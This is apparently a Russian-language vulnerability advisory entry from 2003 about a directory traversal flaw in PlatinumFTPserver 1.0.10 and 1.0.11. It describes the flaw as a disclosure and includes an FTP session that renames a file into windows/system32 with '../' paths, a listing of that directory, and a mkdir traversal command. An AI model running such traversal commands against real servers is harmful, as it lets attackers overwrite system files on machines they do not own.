Дата публикации: | 28.02.2003 |
Всего просмотров: | 995 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в PlatinumFTPserver. Удаленный авторизованный пользователь, включая анонимного пользователя, может просматривать и заменять файлы на сервере, которые расположены вне FTP каталога. Сообщается, что удаленный заверенный пользователь может заменить любые файлы на системе (если у него есть права на загрузку файлов на FTP сервер). Пример: ftp> rename cmd3.exe To name ../../../../windows/system32/cmd2.exe 350 Command OK - waiting for name 250 File/dir renamed to \..\..\..\..\windows\system32\cmd2.exe ftp> dir ../../../../windows/system32/cmd* 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. -rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd.exe -rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd2.exe -rwxr-xr-x 1 User Group 324608 Aug 29 18:40 cmdial32.dll -rwxr-xr-x 1 User Group 41472 Aug 29 18:41 cmdl32.exe -rwxr-xr-x 1 User Group 40505 Aug 18 20:00 cmdlib.wsc 226 Listing complete. ftp: 342 bytes received in 0.00Seconds 342000.00Kbytes/sec. ftp>Также сообщается, что удаленный авторизованный пользователь может создать каталог на целевом сервере, который расположен вне FTP root каталога, следующей командой: mkdir ../testing1Уязвимость обнаружена в PlatinumFTPserver 1.0.10, 1.0.11 |
Ссылки: | Vulnerability for Platinum FTP version 1.0.11 |